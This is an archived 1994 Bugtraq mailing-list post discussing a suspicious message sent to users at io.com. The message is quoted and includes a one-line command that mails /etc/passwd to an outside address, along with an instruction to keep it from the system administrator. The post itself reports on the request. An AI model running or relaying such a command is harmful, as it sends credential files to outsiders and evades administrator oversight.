Bugtraq mailing list archives

Another request for passwords

From: edmonds () cs ubc ca (Brian Edmonds)
Date: Sun, 23 Oct 1994 09:12:55 -0700

On Sun, 23 Oct 1994, "Douglas R. Floyd" <dfloyd () paris eng utsa edu> said:

DRF> Seems like someone is knocking on io.com now.

DRF> BEGIN FUNKY MESSAGE --------

DRF>             mail vanepp () sfu ca < /etc/passwd

DRF> Do not tell your system administrator.  I am
DRF> conducting an investigation on your system.  Thank you

Well, that certainly looks strange, but I can vouch for Peter (van Epp)
as the head sysadmin at Simon Fraser University (sfu).  You might want
to send him mail inquiring what's going on.

---KOR---BGC--DP--Maison-Ikkoku--Dominion--AD-Police---/================
 Brian Edmonds (MSc CompSci) aka Jubal@tmi-2          / SCA: Bardas,OFLT
 http://www.cs.ubc.ca/spider/edmonds    ...plutonium / Lions Gate, AnTir
---Sarah-McLachlan---Beethoven---KLF---Amy-Grant----/___inux spoken here
The right to be heard does not include the right to be taken seriously.